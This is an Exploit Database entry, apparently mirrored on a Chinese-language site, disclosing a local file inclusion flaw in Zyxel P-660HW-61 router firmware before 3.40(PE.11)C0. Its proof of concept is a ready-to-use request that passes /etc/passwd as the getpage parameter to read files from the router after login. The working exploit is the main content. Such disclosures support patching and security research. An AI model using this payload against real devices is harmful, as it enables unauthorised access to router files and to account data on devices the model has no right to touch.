Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion

• Exploit Database
• 99 阅读

• 作者： ReverseBrain
  日期： 2017-05-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/41998/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

  # Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion # Date: 2-05-2017 # Exploit Author: ReverseBrain # Contact: https://www.twitter.com/ReverseBrain # Vendor Homepage: https://www.zyxel.com # Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip # Version: 3.40(PE.11)C0   1. Description   Any user who can login into the router can exploit the Local File Inclusion reading files stored inside the device.   2. Proof of Concept   Login into the router and use the path of a file you want to read as getpage parameter. For example:   http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd